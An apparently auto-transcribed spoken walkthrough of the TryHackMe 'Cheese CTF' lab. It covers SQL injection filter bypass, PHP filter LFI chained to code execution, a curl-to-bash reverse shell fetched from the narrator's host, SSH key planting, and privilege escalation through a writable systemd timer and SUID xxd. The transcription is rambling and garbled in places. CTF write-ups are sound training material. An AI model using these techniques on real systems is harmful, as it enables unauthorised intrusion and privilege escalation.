Hi everybody, good morning. I'm doing this cheese CTF. It was released last night. I didn't see it only in the morning. Usually Tuesday they don't release CTF, but in any case they said inspired by the great cheese talk on TryHackMe. Something happened in Discord. They told, okay, I'm starting with this. I don't know why this nmap is too slow, but in any case we can see that port 80 there is a web application. There is our cheese selection, cheddar, gouda, and brie, and more about us. Because it's an easy room, we can play around and see. Login link is there, so we have a login. We have style, images, nothing special as script.js, not found, so we are not worried about it. So the interesting one that we can think about it is login to PHP and the form again. We go to the page source, nothing special page source, login CSS, password and all of that, so nothing special on it. So of course is it cheesy, so we can play with the cheese here. Let's take the IP, and of course we continue our emulation. Let me mute this, I don't want sorry. Directory -u http minus word list, user share the usually the buster directory to medium, and get me extension PHP. Let's say HTML. Because it's PHP, let's get CSS also. Let's see. So you already have information. We have the login, we have status 200, so it's not behind the login form. User, we have messages and orders. So interesting. So they are PHP, all of them. Let's see. No, they are user HTML, order.html, and user.html. So let's try, for example, orders.html. Nothing special. You go page source, order content here. If you go to users, it said users, nothing hidden, because it's cheesy room, so we need to look if any funny things hidden. Then we have messages. Of course, before we come here, we are in login form. Okay, we can go, for example, here the not reverse shell Swiss. This is one of the best repo. If you want, almost everything is on it. So let's zoom quickly. I'm looking for the injection. So if I look, for example, SQL injection, I assume it's in easy room. I can assume it's in let's assume it's MySQL injection. Of course, the usual suspect, this, that one, and the OR characters, for example. So you can try all of them. Strangely enough, they don't work. If you go test, never save. If you do, for example, even the other characters, doesn't launch error. For example, if you go to the famous one, 1 equal 1, what is that famous one? Or 1 equal 1. If you go there, you can put whatever, same, it's a login error. So you can try all of them, it doesn't work, nothing work here. Okay, the next best thing, you come here and you say, okay, let's automate the process. To automate process, let's say, for example, test. Let me go to blurb. Let's play around. Let's copy this, save it to file. Let's request.txt, and then let's stop this. I don't need it too much stories. And then we can use SQLmap. In SQL, we found this, so we close this, so we can go to SQLmap -r request. We got it. Want to give me the DBS. Let's go straight level equal 3 and risk equal 3. Okay, let's him run there. Okay, we said we found this message, this link. Let's get, because remember when it's cheesy always, oh, these interesting things, this link there. So if I click there, it said if you know, you know. This is first cheese in this room. If you know, you know. Okay, what is I know, you know? Look here, it's MySQL. No, we don't need. He's already detected MySQL. Let's say no. Do you want to include OJust? Yes. Okay, go there. Is redirecting. You can see even with the, if you didn't do this, SQLmap will tell you the link. You can see tell you is redirecting to this link. Of course, we trying database. We don't want him to redirect SQLmap. Just stay where in the login form. Okay, you can do that. And then because SQLmap is already gave us this link, he said this redirection happening here. Okay, we got something, an admin panel. So this is, we got it from SQLmap. So SQLmap give us this. If I click on message, come back here. Remember, it means even if you didn't bypass this login form, that's why it's cheesy. Even if you didn't bypass this login form, you can already arrive to this, and you can arrive to this in two ways. Either you from SQLmap it tell you username is vulnerable, the other no, because he found username. Let's say no, just think continue. So I can arrive to this one without playing with SQL injection. That's fine. And remember, we know from GoBuster we arrived to this page. So if you know, you know. What is you know? You can see the URL here. This is what interesting part. It say PHP filter resource super secret message form admin, and here it come to your head. It's an LFI. Want to prove it? We just go 3 down as normal, and we can say ht pass wd double s, and we got the w. Let's make it view page source because it's easier to see it. If we go there, we can see there is user called comty. Now you think that if I got comty in home comty, maybe you can still steal the user.txt what happened? User.txt. No, it doesn't work. And even if you can't, so it means this permission issue. Even if you go to SSH and you want to get ID RSA, it doesn't. So it means it's not there, and you can get the profile. So we got the profile, so we're cool. We can also get etc group, and etc group will tell us view page source. Why is interesting? Because so you don't think about log injection, because comty is not comty user is on the CD-ROM group and a dip and a preload dev, so it means we can't do that log injection. So that one out of the box. So behind a filter, this PHP filter is very interesting. You can read file of PHP. Where we are now, Do you want a schema to try to optimize? Yeah, just optimize. Go. He find it wherever the payload. So you got the injection here. If we go to that Swiss, so we're still here. Let's open another repo, but let's go for the LFI part of it. Where is LFI? Or local? Why is not? I have it open here. Payload, all things, blob master, file inclusion. Oh, file inclusion. File inclusion. See, if I come to file inclusion here, and remember he said to us, where is that one? Let's close this. Where's the cheese one? Now I'm getting my computer freeze. You see that we're talking about PHP filter. This is what interesting on it. So if you come here, the local file inclusion, let's look straight for PHP wrapper filter. Here the interesting part, you can do the base64 to get so we can use this. Let me show you why. If I do this and I come to my not this one, where is it? No, file equal PHP filter. Now let's call the login.php that we got before. Remember the one what we couldn't bypass here. So let's call it. So we're using filter, we're doing convert to base64. So we got this. Let's copy these things. Guys, you can do this with curl. I always like to do things in an easy way. Don't want to too much fancier. You can call that one with curl the URL, and because it's easy ROM, I don't like to make it too much so if you look here, that's why the OR doesn't work, because use case incentive regular expression filter is filtering the OR. So that's why when we try to use our friend there, didn't work. So now can we do something else? Because OR is filter, we can do the two things. And just put the password whatever it is. Okay, so it's another thing we didn't check about it. Maybe it's not a double, so it's one, the normal one, and then we can have the double bracket for OR, and you can bus it. So that's one way to solve the SQL injection. So it's about OR, because as I said, we able to get a reason why that's the file, and then here you can find that's the password, logins, authentication. Where's the database password? Why is not showing the database password? Okay, funny, strange. Any case, it's not really interesting for us for now, but let's do. So now how to get a shell. Of course, in the same payload there, he tell you very interesting things there. Like for example, note a wrapper can be chained multiple times. Okay, this is the if you want to get the file, and then Also, there is a way to turn the PHP filter into full RCE, and it tell you a serial generator PHP. It gives us this file. So let's go to this one and see what's going on here. Okay, PHP filter chain generator. Let's download it first. So we download the file, and here it gives us some idea, proof of concept. The proof of concept is to see the PHP info file. Let's try if we can get that. Let's see. So we have okay, this one is finished. We have a database user, so we can tell him to get a DP user dump dump all. Let him continue his way. This. So let's go. Oh, I don't know what's wrong with mtemp. Let's just leave it. So basically, this is the file we got now. It's a chain post PHP, and let's see what it gives us. It gives us all this variable. You can use curl. You can just copy. Let's copy from PHP filter. Let's copy. What happens if I copy this now? If I copy this, and then I come to, where's that PHP things? So PHP filter, remove this one and add my payload. So what happened? I see the, so now it give me, so we can run PHP here. So you can guess what's the next option we can do. We can use the smart way and the lazy way. Let's use the lazy way because we like to be lazy. Let me open another one, zoom in. Let's do the lazier. Let's do from shell.sh. Let me get my shell. We can do reverse shell. No, not this one. Reverse shell generator. My IP is 119.25. My port is 9001. Let me get the shell. So I can do nc minus lvnp 9001. I can get my shell, for example this one. I can save this one there, and I can just say okay, save this one, and can write python server 3.9 minus m http.server. Now the idea, okay, you can use that one, it's fine. Clear. Now, how to do this? We can use a PHP function. What's that PHP function? I think system, and I can say let's curl http, give me my 119.25 port 8000 myros, and then I call it shell.sh and just throw it to bash. Let's see if this one can work. If I send this payload, what I did wrong. Oh, it's our friend, because Linux shell. What the hell? Linux shell doesn't like, so we got that, so we can have this funny payload. It's too big payload. Maybe it was better if you used curl. Okay, where is it? PHP filter. So if I copy the whole thing, and then we go to this one. Remember, we just remove this PHP filter, shift and remove it, and paste the new one. and then we have blank page. I didn't get shell. He didn't come here to 8000. Now this one is still working. Where is the clear? What was the command? Why the command is wrong? PHP that's why it's wrong. Spelling error. System curl HTTP download. Okay, this one should be correct. I think I need to switch to curl. There's too much text here. This is the correct one. If I get PHP filter, let's try again. Remove all this, shift and remove, control V, and now we got shell. We got shell, and then let's do quick stabilizing the shell. Let's get this to line so we don't need to type it. And then what's the last one is FG, or what we can do is control Z. Let's get another shell. One way also I found when you Google these PHP filter things, you come here, solving include revenge from because remember because it used the PHP thingy. So it's the same concept. The issue of this PHP filter thing. This PHP filter, we can use this script. Look, it's already ready for us. If I take this script, look for example what happened here. But for whatever reasons doesn't work. Some shell doesn't work. If I come here and just say this is the first shell we have, we're done with this. Let's get vim filter.py. So let's up. If I use this script, so I just need to give him the URL, the correct URL for that he can work with it. The URL of course is before this file equal the command. I can make a shell. The one thing I'm having issue with the PHP shells, the only one that worked, let's change the number 2. The only one worked for me for these things is the classic one. Where is it? Not this one, this one. This classic one is the one that work. Usually this one is always work. So basically, oh no, let's give HTTP so we don't get confused. HTTP. So basically this script is the same as the other one. The other one is more general. So let's not, so to be clear about it, what's this? Okay, you just go. Remember he found the database. Where is it? That's the password, but it's MD5. You can't crack it. That's one of the things. That's the password for the user commit. Comty, but I couldn't crack it. So this is the password. So SQLmap, it give you the password, but it tell you we can't crack it. So password comty. I think this is an MD5 hash. I think so. Okay, let's not. I'm getting confused now. Let's continue first here. We have a filter. We're done with this. We're done with this. I don't need the. So you can see my LVNP 902. Now if I run this in Python 3.9, run filter.py, we'll get directly the one. So basically, this is like a small script that can work straight with this for our room. I got you find it here. I will put the link. Solving include revenge. I found it part of hack tricks. He referred to it here. LFI to RSC via PHP filter. Of course, the other way, what we got here is this one. That's why it's already in your attack box, this repository, the Swiss repo, so you can find it here. So they tell you. So now let's continue the room. Now if we go to, this is the second shell, but let's work with the one that we already stabilized. Clear. One thing I did is I said, okay, because here I just can't not config, there's no config. Sorry, login.php, because here it give you I thought user comty, this is very cheesy password. I thought, okay, why not su comty? Then I thought maybe the password it will work, and now it doesn't work. So authentication failure. So if you go to home, we only have one user is comty, cd comty. If I go ls minus la, it give me account access because it's in the comty. I'm not comty user. Of course you can play around because it's cheesy room. You think maybe they hide in some stuff or something. The next thing you can say, oh, how about that SSH things? Interesting in the SSH read write. I can write to this. So when you can write to the authorized keys, you know what's the obvious thing to do. If I can write to SSH authorized key, I can put my key there. I just can. So this is the comty password. So I can say SSH keygen just generated there. I can get my SSH ID, the public one. What happened? The public one. I can just copy it. Because I can copy, but you know Linux do the backups. Don't worry about this. Just do W and go out. Q. If we do cut SSH authorized key, this is my key. So if I have that, we're done. So we can get, what's the IP again? 171.15. What the hell? I can SSH comty at 10.10 171.15. I should have direct access to comty, and I'm comty now. I can go to his home comty, and now I can access that user T. I'm not showing the flag. Reason it's better to see it yourself, guys, because there is a nice thing in the top, the cheese head -10. It's the start of the flag, but it's better to do it because there's a cheese on top. Head -10 user. See, you can see the, no, it doesn't show. Any case, that's the user flag. Now, of course, clear. What's the next thing? Now we need to become root. We are not. Of course, the next thing is MySQL. Okay, it gives us this. We can reload daemon. We can this is interesting. The explode timer, the start, and then enable. So the first thing come in your head. What is that things? It's a Linux, so it's a system D. If you do and the system. An exploit. If you do that exploit, you find this timer and this service. First, let's talk to this timer things. Exploit timer and then timer on both second went by timer target. It's a Linux system, so the timer and service they are related. If I go, they are related. That's how when you start they relate to each other. So here's the interesting part. Binary bash minus c binary is copying xxd to opt directory, and then you can see they give us root access through xxd. So if we go to what we usually do here, xxd, and then we have the xxd here. We have file write, suid, file read if you are root access, and then we have the sudo part of it. So let's zoom it so we can know this. So the idea is the opt folder is empty now, so we don't have that yet. So of course I just need to start it. Let's start it. I don't need to you're not starting the machine to enable it or something. We just need to start it. No, they need sudo. And it tell you straight, fail to start exploit timer, unit exploit timer has a bad unit file setting, and then tell you system status timer. Let's follow it. Let's not think too big. It's a cheesy room. It said load bad setting, reason unit exploit timer has a bad unit file setting. Okay, Q out. What's wrong in that timer? Let's see. The timer, he said the timer has bad unit. Where is the bad unit here? Description is description. The first thing you notice there is nothing here. So maybe if we put anything here, let's say, remember we can write on this, so that's interesting. Let's put 10 for sake of argument. So if I do that, let me go back again to sudo binary start. Oh, now we can't see, is nothing wrong with it. System status elapsed active, so we don't need to reload the things. We're not doing boot or something. Now let's give say opt file, the opt. Oh, there is the XSD now, and it has the S bit. Now you can read here. He said file write. We can write stuff. We can read. So basically, because you're asking for root flag, you can think what it is. Root flag, it means in its root.txt. Permission denied, so it tells us we can read stuff. So how to read them? You just if I want to read, I just xxd, the name of the file, pipet minus r, because xxd do hex value. So let me do again. So it's opt xxd root.txt pipet to xxt minus r. I'm not showing. I want to submit it. Head minus 10. Cannot open. Oh, my head minus c. Oh, this is a cheese. I think these. It's need to do like we did last night. tail minus n 1. I think the flag is on the bottom. Yeah, this is the root flag. tryhackmecheezectf. Because when you read the flag, there is some what do you call it, graphics in the top, then the flag in the bottom. So for you can just do this first part and you do it. Now we got the flag. Now the question, how to become root? What else we have? We did these things, so we can write to file. So what we can do, echo data xxd x minus r, if you are in Linux and you can write to files and you want to become a root, what can you do? The bash minus p. No, for me I got the flag and then I stop. So I don't know, because it's reading file is not executing that bash minus p trick. So basically it's these things minus what's it, file write. So minus r echo data xxd. Yeah, we can do oh yeah, like we did before. Hold on a minute. Remember we did home .sh no one hosts. So we did the same. No, why is not going? What's wrong with you? Authorized case. We did this for Conti. So can we copy? I can just echo data. Okay, let's do this because it's the same key. So we can just say cut. So that won't work. Cut this one, and I said pipe it to x minus. Okay. So we can just put it there to root. You can here stop because you got the flag, so you don't need to go too much about it. So root. No, I don't think we need to do it like that. We need to call it from the opt. Let's see if it does work. Not sure it file. No, not home root. It's straight root. We can't access to it. Can we access to it? Yeah, we can access to it because we can read it. So if I do opt xsd, I can say, let's see if what we did now is it did work. Authorize and then the normal xsd can fix this minus r. So we have it. So we've been able to copy to that. So if I do that correctly, so I can say, what's this? Let's open another one. SSH root at 10.10.171 .15, it should be straightforward to become root. Yeah, we are root. id root ls, and then we have that the flag. So basically you can read it directly, or you can do the same thing. What else we can do to become root? We can write to file. The only thing you can think about it is authorized keys. There's nothing else I think about it. You can generate SSH or something. Can we do generate SSH keys? We can read the flag directly, and then what? This one is the same. This example, create a local SSH copy of the binary and run it to maintain elevate privilege. sudo install -m. I'm not sure what exactly these things is. This one also read file, so I don't think we can do too much things. I thought maybe we can file to read, so we can read a file, so we can read what else I can do here. I'm thinking about trying to different way, but this is really cheesy room, but it's really, I never knew this before. This part of you can do this. When I saw this room, I thought, oh, okay, so that's why he said to you, when you know. So he's basically looking for this, but I'm not sure, because it's an LFI, so I'm not sure. I'm trying to think if we can get something like, but I think that's the only way you can get the flag directly, by reading it, or SSH keys directly, the same SSH keys we have. We can't generate keys for root from a user. To be nonsense. Or we can. I mean, if I generate, but the keys get generated for the user. You can just any case, I think that's for now. I'm not sure. We'll think about it again. Okay. Thank you very much, guys, and I hope you like it. If you have a question, please let me know. Thank you. Have a good day.